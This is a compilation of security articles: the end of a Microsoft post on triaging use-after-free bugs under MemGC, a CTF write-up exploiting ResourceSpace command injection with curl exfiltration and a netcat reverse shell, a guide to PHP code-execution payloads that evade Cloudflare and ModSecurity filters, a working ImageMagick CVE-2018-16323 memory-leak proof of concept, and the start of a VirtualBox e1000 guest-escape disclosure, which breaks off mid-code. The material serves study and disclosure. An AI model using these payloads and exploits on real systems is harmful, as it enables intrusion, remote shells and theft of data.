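    # Reference in frame_8, crash in frame_5: present the whole time.
    print(triage_stack_uaf(crash_frame=5, reference_frames=[8]))
    # Reference only in frame_3: popped before execution reaches frame_5.
    print(triage_stack_uaf(crash_frame=5, reference_frames=[3]))
```

A crash on an already freed block under Stress Mode (the second situation above) falls outside this helper, since it usually means the reference lives on the heap rather than the stack.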

MemGC

MemGC is a new replacement for MP, currently available in Edge and all supported versions of IE11, and mitigates use-after-free vulnerabilities in a similar fashion as MP. However, it also offers additional protection by scanning the heap for references to protected object types, as well as the stack and registers. MemGC will zero write upon free and will delay the actual free until garbage collection is triggered and no references to the freed object are found.

Just like MP, mitigated use-after-free vulnerabilities will most likely result in a near-null pointer dereference or occasionally in no crash at all. If you suspect that a near-null pointer dereference is actually a mitigated use-after-free vulnerability you can verify this with the following steps:

  • Find the position where the near-null value is read, determining the base pointer of the object:

If we dump the object, we can see that it has been zero-written as before:

  • Trace back and find the allocation call stack for this chunk, using the base pointer that was found in the first step. If the object is allocated with edgehtml!MemoryProtection::HeapAlloc() or edgehtml!MemoryProtection::HeapAllocClear() it means that the object is tracked by MemGC e.g.

Similarly, when the object is freed, it will be via edgehtml!MemoryProtection::HeapFree() e.g.

To double check that the issue is successfully mitigated, we can scan for references to the object on both the heap and stack.

For scanning the stack, we can use the same technique as described in the Memory Protector section. We can then use the same criteria as described above to determine exploitability; if there exists a stack reference between the freeing point and crashing point, we consider it strongly mitigated by MemGC.

When scanning the heap, we use a similar method, by first scanning the heap for references with values between the base pointer and basepointer+object_size of the object we are interested in. If any references are found, we then just need to check to see what objects they are associated with. If the object containing the reference is also tracked by MemGC (i.e. allocated via HeapAlloc() or HeapAllocClear()), then MemGC will not free the object we are interested in, so we consider it strongly mitigated by MemGC.
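
The heap-scanning step can be pictured with a minimal Python sketch. It is not a debugger command: the `find_references` helper, the 8-byte little-endian pointer size and the idea of working on a raw byte snapshot are all assumptions made for illustration. It walks a memory snapshot one pointer-sized slot at a time and reports every slot whose value falls between the base pointer and basepointer+object_size.

```python
import struct

def find_references(memory: bytes, region_start: int, base: int,
                    object_size: int, ptr_size: int = 8):
    """Return addresses of pointer-sized slots whose value points into the object.

    memory       -- raw snapshot of a memory region (hypothetical input)
    region_start -- virtual address of memory[0]
    base         -- base pointer of the object under investigation
    object_size  -- size of that object in bytes
    """
    fmt = "<Q" if ptr_size == 8 else "<I"
    hits = []
    # Only aligned slots are checked, which is where pointers are normally stored.
    for offset in range(0, len(memory) - ptr_size + 1, ptr_size):
        (value,) = struct.unpack_from(fmt, memory, offset)
        if base <= value < base + object_size:
            hits.append(region_start + offset)
    return hits

# Tiny demonstration on a fabricated 32-byte region.
snapshot = struct.pack("<4Q", 0, 0x10000010, 0xDEADBEEF, 0x10000040)
print([hex(a) for a in find_references(snapshot, 0x20000000, 0x10000000, 0x40)])
```

Each hit then still has to be mapped back to the object that contains it, to check whether that container is itself tracked by MemGC.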

In this example, if we use the stack scanning command from above, we see that there is a reference on the stack preventing the object from being freed between the deletion and crashing points, making it successfully mitigated by MemGC.

Conclusions

In conclusion, these new mitigations dramatically enhance security by making sets of use-after-free vulnerabilities non-exploitable. When triaging issues in both IE and Edge, the behavior of these mitigations needs to be taken into account in order to determine exploitability.

Acknowledgments

We would like to thank the following people for their contribution to this post:

Chris Betz, Crispin Cowan, John Hazen, Gavin Thomas, Marek Zmyslowski, Matt Miller, Mechele Gruhn, Michael Plucinski, Nicolas Joly, Phil Cupp, Sermet Iskin, Shawn Richardson and Suha Can

Stephen Fleming & Richard van Eeden.  MSRC Engineering, Vulnerabilities & Mitigations Team.

Insomni’Hack Teaser 2019 — exploit-space

Original text by @Ghostx_0

CTF URL: https://teaser.insomnihack.ch/

Solves: 7 / Points: 500 / Category: Web

Challenge description

We have created a little exploit space and made it accessible for everyone! Have fun! You can get your own exploit space here.

Challenge resolution

This challenge was the most realistic yet fun web challenge of this Insomni’Hack teaser, as it presented nothing less than an installation of the ResourceSpace open source digital asset management software.

The first step, like for any challenge, was the reconnaissance phase.

As indicated in the commented HTML code, the installed version of ResourceSpace was 8.6.12117:

ResourceSpace Version

This software being open source, we can audit its source code in order to find vulnerabilities we can exploit.

We can then look at the Git commit logs to find juicy commit messages like this one:

Commit logs

The diff view for this commit reveals the vulnerable entry point: in the “/plugins/pdf_split/pages/pdf_split.php” page, user input is passed to the run_command() function:

Git diff

The fix introduced by this commit just sanitizes the user inputs by applying the escapeshellarg() function:

escapeshellarg function

Using the semi-colon character thus completes the command line, allowing us to execute arbitrary commands on the web server. However, as we don’t have a directly visible output, we need an HTTP server that listens for incoming requests, such as the Burp collaborator.
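
To see why the missing escaping matters, here is a small Python sketch of the same class of bug. It is an analogy, not the ResourceSpace code: the `build_command_*` helpers and the `split_tool` command name are made up for illustration, and `shlex.quote` plays the role that escapeshellarg() plays in PHP.

```python
import shlex

def build_command_unsafe(filename: str) -> str:
    # User input is pasted into the command line as-is.
    return "split_tool " + filename

def build_command_safe(filename: str) -> str:
    # Quoting turns the whole input into a single shell word.
    return "split_tool " + shlex.quote(filename)

payload = "in.pdf; whoami"
print(build_command_unsafe(payload))  # split_tool in.pdf; whoami
print(build_command_safe(payload))    # split_tool 'in.pdf; whoami'
```

In the unsafe variant a shell would treat everything after the semi-colon as a second command; in the quoted variant the semi-colon is just part of a file name.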

The following POST request uses the curl binary in order to send the result of the whoami command to our web server:

POST request whoami

Immediately after, we see the result of our command in our Burp collaborator interactions panel:

whoami

The final step is to locate and get the flag:

POST request getflag

Wait… What? There’s a captcha that prevents non-interactive access:

captcha

We actually need to obtain an interactive reverse shell on this server.

To do so we can download the netcat binary from our web server using curl, add execution permission and run it:

reverse shell 1

As expected, the web server just connects back to our server, therefore providing us with an interactive reverse shell:

reverse shell 2

And finally we can solve the captcha and get the flag:

flag

How To Exploit PHP Remotely To Bypass Filters & WAF Rules

( Original text by Andrea Menin )

In the last three articles, I’ve been focused on how to bypass WAF rule set in order to exploit a remote command execution. In this article, I’ll show you how many possibilities PHP gives us in order to exploit a remote code execution bypassing filters, input sanitization, and WAF rules. Usually when I write articles like this one people always ask “really people write code like this?” and typically they’re not pentesters. Let me answer before you ask me again : YES and YES.

This is the first of two vulnerable PHP scripts that I’m going to use for all tests. This script is definitely too easy and dumb, but it’s just for reproducing a remote code execution vulnerability scenario (in a real scenario, you’ll probably do a little bit more work to reach this situation):

first PHP script

Obviously, the sixth line is pure evil. The third line tries to intercept functions like system, exec or passthru (there are many other functions in PHP that can execute system commands, but let’s focus on these three). This script is running in a web server behind the CloudFlare WAF (as always, I’m using CloudFlare because it’s easy and widely known; this doesn’t mean that CloudFlare WAF is not secure. All other WAFs have the same issues, more or less…). The second script will be behind ModSecurity + OWASP CRS3.

Trying to read /etc/passwd

For the first test, I try to read /etc/passwd using system() function by the request /cfwaf.php?code=system(“cat /etc/passwd”);

CloudFlare WAF blocks my first try

As you can see, CloudFlare blocks my request (maybe because the “/etc/passwd”) but, if you have read my last article about uninitialized variable, I can easily bypass with something like cat /etc$u/passwd

CloudFlare WAF bypassed but input sanitization blocks the request

CloudFlare WAF has been bypassed but the check on the user’s input blocked my request because I’m trying to use the “system” function. Is there a syntax that lets me use the system function without using the “system” string? Let’s take a look at the PHP documentation about strings!

PHP String escape sequences

\[0-7]{1,3} sequence of characters in octal notation, which silently overflows to fit in a byte (e.g. “\400” === “\000”)

\x[0-9A-Fa-f]{1,2} sequence of characters in hexadecimal notation (e.g. “\x41”)

\u{[0-9A-Fa-f]+} sequence of Unicode codepoint, which will be output to the string as that codepoint’s UTF-8 representation (added in PHP 7.0.0)

Not everyone knows that PHP has a lot of syntaxes for representing a string, and with the “PHP Variable functions” it becomes our Swiss Army knife for bypassing filters and rules.

PHP Variable functions

PHP supports the concept of variable functions. This means that if a variable name has parentheses appended to it, PHP will look for a function with the same name as whatever the variable evaluates to, and will attempt to execute it. Among other things, this can be used to implement callbacks, function tables, and so forth.

This means that syntaxes like $var(args); and “string”(args); are equal to function(args);. If I can call a function by using a variable or a string, it means that I can use an escape sequence instead of the name of a function. Here is an example:

the third syntax is an escape sequence of characters in a hexadecimal notation that PHP converts to the string “system” and then it converts to the function system with the argument “ls”. Let’s try with our vulnerable script:

user input sanitization bypassed
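
The hexadecimal spelling of a function name is easy to produce mechanically. The following Python sketch only illustrates the encoding (the helper names `to_hex_escapes` and `from_hex_escapes` are mine, not part of any tool): it turns a name into a run of \xNN sequences and back, and shows that the literal word no longer appears in the encoded form, which is what a naive string filter would look for.

```python
def to_hex_escapes(name: str) -> str:
    """Spell every byte of `name` as a \\xNN escape sequence."""
    return "".join("\\x{:02x}".format(b) for b in name.encode("ascii"))

def from_hex_escapes(escaped: str) -> str:
    """Decode a string made only of \\xNN sequences back to plain text."""
    return bytes.fromhex(escaped.replace("\\x", "")).decode("ascii")

encoded = to_hex_escapes("system")
print(encoded)                    # \x73\x79\x73\x74\x65\x6d
print(from_hex_escapes(encoded))  # system
print("system" in encoded)        # False
```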

This technique doesn’t work for all PHP functions: variable functions won’t work with language constructs such as echo, print, unset(), isset(), empty(), include, require and the like. Utilize wrapper functions to make use of any of these constructs as variable functions.

Improve the user input sanitization

What happens if I exclude characters like double and single quotes from the user input on the vulnerable script? Is it possible to bypass it even without using double quotes? Let’s try:

prevent using “ and ‘ on $_GET[code]

As you can see on the third line, now the script prevents the use of “ and ‘ inside the $_GET[code] querystring parameter. My previous payload should be blocked now:

Now my vulnerable script prevents using “

Luckily, in PHP, we don’t always need quotes to represent a string. PHP lets you declare the type of an element, something like $a = (string)foo; in this case, $a contains the string “foo”. Moreover, whatever is inside round brackets without a specific type declaration is treated as a string:

In this case, we have two ways to bypass the new filter: the first one is to use something like (system)(ls); but we can’t use “system” inside the code parameter, so we can concatenate strings like (sy.(st).em)(ls);. The second one is to use the $_GET variable. If I send a request like ?a=system&b=ls&code=$_GET[a]($_GET[b]); the result is: $_GET[a] will be replaced with the string “system” and $_GET[b] will be replaced with the string “ls” and I’ll be able to bypass all filters!

Let’s try with the first payload (sy.(st).em)(whoami);

WAF bypassed, filter bypassed

and the second payload ?a=system&b=cat+/etc&c=/passwd&code=$_GET[a]($_GET[b].$_GET[c]);

WAF bypassed, filter bypassed

In this case it is not useful, but you can even insert comments inside the function name and inside the arguments (this could be useful in order to bypass a WAF Rule Set that blocks specific PHP function names). All the following syntaxes are valid:

get_defined_functions

This PHP function returns a multidimensional array containing a list of all defined functions, both built-in (internal) and user-defined. The internal functions will be accessible via $arr[“internal”], and the user-defined ones using $arr[“user”]. For example:

This could be another way to reach the system function without using its name. If I grep for “system” I can discover its index number and use it as a string for my code execution:

1077 = system

obviously, this should work against our CloudFlare WAF and script filters:

bypass using get_defined_functions

Array of characters

Each string in PHP can be used as an array of characters (almost like Python does) and you can refer to a single string character with the syntax $string[2] or $string[-3]. This could be another way to elude rules that block PHP functions names. For example, with this string $a=”elmsty/ “; I can compose the syntax system(“ls /tmp”);
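
Working out the indices by hand is tedious, so here is a small Python sketch that does the lookup. The helper names `char_indices` and `as_php_expression` are hypothetical; the script only prints the index list and the matching PHP-style concatenation for a given source string.

```python
def char_indices(source: str, target: str):
    """Return, for each character of target, its first index in source.

    Raises ValueError when a needed character is missing from source.
    """
    indices = []
    for ch in target:
        pos = source.find(ch)
        if pos == -1:
            raise ValueError(
                "character {!r} is not available in the source string".format(ch))
        indices.append(pos)
    return indices

def as_php_expression(var: str, indices) -> str:
    # Render the indices as PHP string concatenation, e.g. $a[3].$a[5]
    return ".".join("{}[{}]".format(var, i) for i in indices)

source = "elmsty/ "
idx = char_indices(source, "system")
print(idx)                           # [3, 5, 3, 4, 0, 2]
print(as_php_expression("$a", idx))  # $a[3].$a[5].$a[3].$a[4].$a[0].$a[2]
```

With this helper, "ls /" maps to [1, 3, 7, 6]. A character that is absent from the source string (for instance the "p" of "/tmp" in the string above) makes it raise, so that character has to come from somewhere else.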

If you’re lucky you can find all the characters you need inside the script filename. With the same technique, you can pick all chars you need with something like (__FILE__)[2]:

OWASP CRS3

Let me say that with the OWASP CRS3 everything becomes harder. First, with the techniques seen before I can bypass only the first paranoia level, and this is amazing! Because Paranoia Level 1 is just a small subset of the rules we can find in the CRS3, and this level is designed to prevent any kind of false positive. With Paranoia Level 2 things become hard because of the rule 942430 “Restricted SQL Character Anomaly Detection (args): # of special characters exceeded”. What I can do is just execute a single command without arguments like “ls”, “whoami”, etc., but I can’t execute something like system(“cat /etc/passwd”) as done with CloudFlare WAF:

Previous Episodes

Web Application Firewall Evasion Techniques #1
https://medium.com/secjuice/waf-evasion-techniques-718026d693d8

Web Application Firewall Evasion Techniques #2
https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0

Web Application Firewall Evasion Techniques #3
https://www.secjuice.com/web-application-firewall-waf-evasion/

Yet another memory leak in ImageMagick or how to exploit CVE-2018-16323.

( Original text by barracud4_ )

Hi, in this article we’ll talk about ImageMagick vulnerabilities.

TL;DR:
PoC generator for CVE-2018-16323 (Memory leakage via XBM images in ImageMagick)

What is ImageMagick? From imagemagick.org:

Use ImageMagick® to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) including PNG, JPEG, GIF, HEIC, TIFF, DPX, EXR, WebP, Postscript, PDF, and SVG. Use ImageMagick to resize, flip, mirror, rotate, distort, shear and transform images, adjust image colors, apply various special effects, or draw text, lines, polygons, ellipses and Bézier curves.

This is a very rich library for processing images. If you google “how to resize a picture in php” or “how to crop an image”, then most likely you will find advice on how to use ImageMagick. This library has long had security problems. And today we will look at a fresh vulnerability and recall some old ones.


Part 1 — Yet another memory leak

For the past two years vulnerabilities in ImageMagick libraries have appeared almost every month. Fortunately, many of them are some kind of non-applicable DoS, which does not pose serious security problems. But recently we have noticed an interesting CVE-2018-16323.

Sounds easy! But we didn’t find any information about exploit for this vulnerability.

Look at the commit referenced to the CVE:

“XBM coder leaves the hex image data uninitialized if hex value of the pixel is negative“

Hmm.. Let’s explore the XBM file format. A common XBM image looks like this:

Which is very similar to C code. This format is very old and was used in the X Window System to store cursor and icon bitmaps used in the X GUI. Each value in the keyboard16_bits array represents 8 pixels; each pixel is a single bit and encodes one of two colors, black or white. So there are no negative pixels, as one pixel has only two possible values. From here on we will call that array the XBM body array.

Let’s look closer at the ImageMagick code and find out what a “pixel is negative” means at commit details. We need a ReadXBMImage() function. This function reads an image and prepares data for image processing. Seems like variable image contains the image data being processed (Line 225).

Next, at lines 344–348 there is a memory allocation, and the pointer data now points to the start address of the allocated memory. The pointer p also points to the same address.

Memory allocation

Next come lines 352–360 and 365–371: the same code, but for different versions of the XBM image. As can be seen from the commit, both branches are equally vulnerable, so we will consider just one of them. Reading the XBM body array happens in the function XBMInteger(), which returns an int into variable c. Then, at line 358, the value stored in variable c is written through the pointer p, and the pointer is incremented.

Allocated memory filling

In the commit we see that in the previous version variable c was checked for a negative value, and if it was negative the loop ended with a break; that is why the memory leak appeared. If the first value of the XBM body array is negative, then all the allocated memory remains uninitialized and may contain sensitive data from memory, which will be further processed, and a new image will be generated from this data. In the patched version this was changed: now if a value of the XBM body array is negative, ImageMagick throws an error.

Now let’s take a closer look at the XBMInteger() function. It takes a pointer image and a pointer hex_digits as arguments. The latter is an array which is initialized at line 305. This function maps allowed values to hex values in the XBM body array. XBMInteger() reads the next byte defined in the XBM body array and puts it into the unsigned int variable value. There is an interesting detail: this function reads hex symbols until the stop token appears. This means that we can specify hex values of arbitrary length, so instead of the expected 0–255 range of a char we can set any unsigned int value, which will be stored in variable value. And the next fatal fact is that variable value is converted to a signed int… Bingo!

Convert unsigned int to int is a bad idea
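
The effect of that conversion can be reproduced with plain integer arithmetic. The Python sketch below is a simplified model, not the ImageMagick source: `parse_hex_unsigned32` and `as_signed32` are hypothetical helpers, and a 32-bit two's-complement int is assumed. It accumulates hex digits of any length into a 32-bit unsigned value and then reinterprets the result as signed.

```python
def parse_hex_unsigned32(token: str) -> int:
    """Accumulate hex digits into a 32-bit unsigned value (simplified model)."""
    digits = token[2:] if token.lower().startswith("0x") else token
    value = 0
    for ch in digits:
        # Wrap around like a 32-bit unsigned int would.
        value = (value * 16 + int(ch, 16)) & 0xFFFFFFFF
    return value

def as_signed32(value: int) -> int:
    """Reinterpret a 32-bit unsigned value as a two's-complement signed int."""
    return value - 0x100000000 if value & 0x80000000 else value

for token in ("0xff", "0x7fffffff", "0x80000000", "0x80000001"):
    print(token, as_signed32(parse_hex_unsigned32(token)))
```

Only the last two tokens come out negative, which is the condition the pre-patch loop treated as "stop reading".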

So we just need to put a value into the XBM body array that will be converted to a negative int. That is any value above 2,147,483,647 (0x7FFFFFFF), i.e. 0x80000000 or higher. That’s the whole PoC:

#define test_width 500
#define test_height 500
static char test_bits[] = {
0x80000001, };

The amount of leaked memory depends on how you set the height and width parameters. If you set 500×500, then about 31250 (500*500/8) bytes will leak! But it also depends on how the application uses ImageMagick; it may be that it crops the image to a certain height and width.
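
For experimenting with different dimensions, the PoC file can be generated with a few lines of Python. This is only a sketch: `make_xbm_poc` and `approx_leak_bytes` are hypothetical helper names, the output mirrors the four-line PoC shown above, and the size estimate uses the same width*height/8 approximation as the text.

```python
def make_xbm_poc(width: int, height: int, name: str = "test") -> str:
    """Build the text of an XBM file whose only body value is 0x80000001."""
    return (
        "#define {n}_width {w}\n"
        "#define {n}_height {h}\n"
        "static char {n}_bits[] = {{\n"
        "0x80000001, }};\n"
    ).format(n=name, w=width, h=height)

def approx_leak_bytes(width: int, height: int) -> int:
    # One bit per pixel, as in the 500*500/8 estimate.
    return width * height // 8

poc = make_xbm_poc(500, 500)
print(poc)
print(approx_leak_bytes(500, 500))  # 31250
```

Writing `poc` to a file named poc.xbm gives the input used in the next step.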

While we were testing this PoC, we encountered a problem. Not all the ImageMagick versions below 7.0.8-9 appeared to be vulnerable as described at cvedetails. We found another commit that fixed another vulnerability, CVE-2017-14175, which is a DoS vulnerability in XBM image processing. And as you can see, it was this particular commit that brought the vulnerability into the code.

Okay, let’s try the PoC. Let’s install one of the vulnerable versions (e.g. 6.9.9-51). Now, running convert poc.xbm poc.png triggers the XBM image processing in the xbm.c file, and therefore the vulnerable code.

The resulting image should be like this:

Image contains leaked memory

You can see some noise in the resulting image: this is leaked memory, and each black or white pixel is a bit of information from it. If you repeat the convert command, you will likely get another image, because another memory chunk will be caught.

What do we need to extract leaked memory bytes?

Simply convert it back, convert poc.png leak.xbm, now we see leaked memory bytes in XBM body array and this is very easy to parse format. Extract it and get leaked memory bytes.
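
Parsing the XBM body array back into bytes takes only a regular expression. The Python sketch below is a minimal illustration; `extract_xbm_bytes` is a hypothetical helper and the sample text is fabricated, not real leaked data.

```python
import re

def extract_xbm_bytes(xbm_text: str) -> bytes:
    """Return the values of the XBM body array as raw bytes."""
    # Take everything between the first '{' and the last '}'.
    body = xbm_text[xbm_text.index("{") + 1 : xbm_text.rindex("}")]
    values = [int(tok, 16) for tok in re.findall(r"0[xX][0-9a-fA-F]+", body)]
    # Keep only the low byte of each value, since each entry stands for 8 pixels.
    return bytes(v & 0xFF for v in values)

sample = """#define leak_width 16
#define leak_height 2
static char leak_bits[] = {
  0x41, 0x42, 0x43, 0x44, };
"""
print(extract_xbm_bytes(sample))  # b'ABCD'
```

Depending on how the image was converted along the way, the bits may come back inverted or reordered, so treat the output as a starting point for inspection.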

So,

  1. Generate a PoC;
  2. Upload it to your avatar on vulnerable application;
  3. Save resulting png/jpg/gif image;
  4. Extract data from image.

ttffdd wrote a simple easy to use tool for this vulnerability called XBadManners. It generates a PoC and recovers leaked data from image.

Notice! ImageMagick is a smart library: you can upload a poc.png which contains XBM image data to the server, and if the image type is not checked properly, ImageMagick will process poc.png as an XBM image. So just checking that the uploaded file name matches “*.png” will not save you.


Part 2 — Is ImageMagick secure?

Short answer — probably not.

It is not the first serious vulnerability found in ImageMagick software. There are plenty of vulnerabilities. ImageMagick has almost 500 known fixed vulnerabilities! Every month there are new vulnerabilities found that may be difficult to exploit or not applicable, and a couple of times a year some serious vulnerabilities with high impact show up.

Here is a top list of widely known ImageMagick vulnerabilities.

ImageTragick. The most famous series of vulnerabilities in ImageMagick. It includes RCE, SSRF, and Local File Read/Move/Delete in svg and mvg files. It was discovered in April 2016 by stewie and Nikolay Ermishkin.

  • CVE-2016-3714: RCE
  • CVE-2016-3718: SSRF
  • CVE-2016-3715: File deletion
  • CVE-2016-3716: File moving
  • CVE-2016-3717: Local file read

A patch was available in ImageMagick version 6.9.3-9, released 2016-04-30. This vulnerability was quite popular with bughunters:

CVE-2017-15277 a.k.a. gifoeb. Discovered by Emil Lerner in July 2017. This vulnerability is a memory leak in GIF image processing. ImageMagick leaves the palette uninitialized if neither a global nor a local palette is present, and the memory leak occurs exactly through the palette. This rather limited the length of the leaked data. This vulnerability was also popular with bughunters.

GhostScript Type Confusion RCE (CVE-2017-8291). It was discovered in May 2017. It’s not an ImageMagick vulnerability, but it affects ImageMagick because it uses ghostscript to handle certain types of images with PostScript, i.e. EPS and PDF files.

CVE-2018-16509, another RCE in GhostScript, was published in August 2018. It also affects ImageMagick, since it is in GhostScript like the previous bug.

How many other vulnerabilities that carry serious security problems remain unknown? We do not know. We have specially prepared a small history of ImageMagick security infographic.

History of ImageMagick security

Part 3 — How can we use ImageMagick in a secure way?

Stop using ImageMagick? Maybe, but..

We do not tell you to stop using the ImageMagick. We advise you to do this in a safe way to reduce information security risks.

First, as you may have noticed ImageMagick has a lot of vulnerabilities constantly appearing and therefore it is also updated frequently. If you use ImageMagick then watch for new versions and make sure the latest version is installed at all times. Notice that ImageMagick is not frequently updated in official repositories so it may contain old vulnerable versions. It is best to install stable ImageMagick version from source code.

But as you can see from our example, fixing old vulnerabilities brings new vulnerabilities 🙂

Therefore, updating ImageMagick may not save you.

Best practice for ImageMagick is to run it in an isolated environment, like Docker. Set minimum required rights for the service that uses ImageMagick. Put it in an isolated network segment with minimal network rights. And use this isolated environment ONLY for a specific task of processing custom user images using ImageMagick.

ImageMagick also has a configurable security policy.

Here you can find a detailed guide on the security of ImageMagick from developers.

 

Virtualbox e1000 0day

Why

I like VirtualBox and it has nothing to do with why I publish a 0day vulnerability. The reason is my disagreement with contemporary state of infosec, especially of security research and bug bounty:

  1. Waiting half a year until a vulnerability is patched is considered fine.
  2. In the bug bounty field these are considered fine:
    1. Waiting more than a month until a submitted vulnerability is verified and a decision to buy or not to buy is made.
    2. Changing the decision on the fly. Today you figure out the bug bounty program will buy bugs in a software, a week later you come with bugs and exploits and receive «not interested».
    3. Not having a precise list of software a bug bounty is interested to buy bugs in. Handy for bug bounties, awkward for researchers.
    4. Not having precise lower and upper bounds of vulnerability prices. There are many things influencing a price but researchers need to know what is worth working on and what is not.
  3. Delusion of grandeur and marketing bullshit: naming vulnerabilities and creating websites for them; making a thousand conferences in a year; exaggerating importance of own job as a security researcher; considering yourself «a world saviour». Come down, Your Highness.

I’m exhausted of the first two, therefore my move is full disclosure. Infosec, please move forward.

General Information

Vulnerable software: VirtualBox 5.2.20 and prior versions.

Host OS: any, the bug is in a shared code base.

Guest OS: any.

VM configuration: default (the only requirement is that a network card is Intel PRO/1000 MT Desktop (82540EM) and a mode is NAT).

How to protect yourself

Until the patched VirtualBox build is out you can change the network card of your virtual machines to PCnet (either of two) or to Paravirtualized Network. If you can’t, change the mode from NAT to another one. The former way is more secure.

Introduction

The default VirtualBox virtual network device is Intel PRO/1000 MT Desktop (82540EM) and the default network mode is NAT. We will refer to the device as E1000.

The E1000 has a vulnerability allowing an attacker with root/administrator privileges in a guest to escape to a host ring3. Then the attacker can use existing techniques to escalate privileges to ring 0 via /dev/vboxdrv.

Vulnerability Details

E1000 101

To send network packets a guest does what a common PC does: it configures a network card and supplies network packets to it. Packets consist of data link layer frames and other, higher-level headers. Packets supplied to the adaptor are wrapped in Tx descriptors (Tx means transmit). The Tx descriptor is a data structure described in the 82540EM datasheet (317453006EN.PDF, Revision 4.0). It stores metainformation such as packet size, VLAN tag, TCP/IP segmentation enabled flags and so on.

The 82540EM datasheet provides for three Tx descriptor types: legacy, context, data. Legacy is deprecated, I believe. The other two are used together. The only thing we care about is that context descriptors set the maximum packet size and switch TCP/IP segmentation, and that data descriptors hold physical addresses of network packets and their sizes. The data descriptor’s packet size must be less than the context descriptor’s maximum packet size. Usually context descriptors are supplied to the network card before data descriptors.

To supply Tx descriptors to the network card a guest writes them to the Tx Ring. This is a ring buffer residing in physical memory at a predefined address. When all descriptors are written to the Tx Ring, the guest updates the E1000 MMIO TDT register (Transmit Descriptor Tail) to tell the host there are new descriptors to handle.

Input

Consider the following array of Tx descriptors:

[context_1, data_2, data_3, context_4, data_5]

Let’s assign their structure fields as follows (field names are hypothetical to be human readable but directly map to the 82540EM specification):

context_1.header_length = 0
context_1.maximum_segment_size = 0x3010
context_1.tcp_segmentation_enabled = true

data_2.data_length = 0x10
data_2.end_of_packet = false
data_2.tcp_segmentation_enabled = true

data_3.data_length = 0
data_3.end_of_packet = true
data_3.tcp_segmentation_enabled = true

context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true

data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

We will learn why they should be like that in our step-by-step analysis.

Root Cause Analysis

[context_1, data_2, data_3] Processing

Let’s assume the descriptors above are written to the Tx Ring in the specified order and the TDT register is updated by the guest. Now the host will execute the e1kXmitPending function in the src/VBox/Devices/Network/DevE1000.cpp file (most comments are and will be stripped for the sake of readability):

static int e1kXmitPending(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
        while (!pThis->fLocked && e1kTxDLazyLoad(pThis))
        {
            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

e1kTxDLazyLoad will read all the 5 Tx descriptors from the Tx Ring. Then e1kLocateTxPacket is called for the first time. This function iterates through all the descriptors to set up an initial state but does not actually handle them. In our case the first call to e1kLocateTxPacket will handle context_1, data_2, and data_3 descriptors. The two remaining descriptors, context_4 and data_5, will be handled at the second iteration of the while loop (we will cover the second iteration in the next section). This two-part array division is crucial to trigger the vulnerability so let’s figure out why.

e1kLocateTxPacket looks like this:

static bool e1kLocateTxPacket(PE1KSTATE pThis)
{
...
    for (int i = pThis->iTxDCurrent; i < pThis->nTxDFetched; ++i)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[i];
        switch (e1kGetDescType(pDesc))
        {
            case E1K_DTYP_CONTEXT:
                e1kUpdateTxContext(pThis, pDesc);
                continue;
            case E1K_DTYP_LEGACY:
                ...
                break;
            case E1K_DTYP_DATA:
                if (!pDesc->data.u64BufAddr || !pDesc->data.cmd.u20DTALEN)
                    break;
                ...
                break;
            default:
                AssertMsgFailed(("Impossible descriptor type!"));
        }

The first descriptor (context_1) is of E1K_DTYP_CONTEXT so the e1kUpdateTxContext function is called. This function updates a TCP Segmentation Context if TCP Segmentation is enabled for the descriptor. It is true for context_1 so the TCP Segmentation Context will be updated. (What the TCP Segmentation Context Update actually is, is not important, and we will use this just to refer to the code below).

The second descriptor (data_2) is of E1K_DTYP_DATA so several actions unnecessary for the discussion will be performed.

The third descriptor (data_3) is also of E1K_DTYP_DATA but since data_3.data_length == 0 no action is performed.

At this point three descriptors have been initially processed and two remain. Now the thing: after the switch statement there is a check whether a descriptor’s end_of_packet field was set. It is true for the data_3 descriptor (data_3.end_of_packet == true). The code does some actions and returns from the function:

        if (pDesc->legacy.cmd.fEOP)
        {
            ...
            return true;
        }

If data_3.end_of_packet had been false then the remaining context_4 and data_5 descriptors would have been processed, and the vulnerability would have been bypassed. Below you’ll see why that return from the function leads to the bug.
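
The way the five descriptors fall into two groups can be replayed with a toy model. The Python sketch below is not VirtualBox code: the `Desc` class and the `locate_packet` helper are hypothetical and mirror only the control flow discussed here, namely scanning forward and returning right after the first descriptor whose end_of_packet flag is set.

```python
from dataclasses import dataclass

@dataclass
class Desc:
    name: str
    kind: str                  # "context" or "data"
    end_of_packet: bool = False

def locate_packet(descs, start: int) -> int:
    """Return the index one past the packet that begins at `start`."""
    for i in range(start, len(descs)):
        if descs[i].end_of_packet:
            return i + 1
    return len(descs)

ring = [
    Desc("context_1", "context"),
    Desc("data_2", "data", end_of_packet=False),
    Desc("data_3", "data", end_of_packet=True),
    Desc("context_4", "context"),
    Desc("data_5", "data", end_of_packet=True),
]

# Repeatedly locate the next packet, as the inner while loop would.
groups, pos = [], 0
while pos < len(ring):
    end = locate_packet(ring, pos)
    groups.append([d.name for d in ring[pos:end]])
    pos = end
print(groups)
```

Flipping `end_of_packet` on data_3 to False in this model makes all five descriptors land in a single group, which matches the remark above.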

At the end of the e1kLocateTxPacket function we have the following descriptors ready to unwrap network packets from and to send to a network: context_1, data_2, data_3. Then the inner loop of e1kXmitPending calls e1kXmitPacket. This function iterates through all the descriptors (5 in our case) to actually process them:

static int e1kXmitPacket(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
    while (pThis->iTxDCurrent < pThis->nTxDFetched)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[pThis->iTxDCurrent];
        ...
        rc = e1kXmitDesc(pThis, pDesc, e1kDescAddr(TDBAH, TDBAL, TDH), fOnWorkerThread);
        ...
        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;
    }

For each descriptor e1kXmitDesc function is called:

static int e1kXmitDesc(PE1KSTATE pThis, E1KTXDESC *pDesc, RTGCPHYS addr,
                       bool fOnWorkerThread)
{
...
    switch (e1kGetDescType(pDesc))
    {
        case E1K_DTYP_CONTEXT:
            ...
            break;
        case E1K_DTYP_DATA:
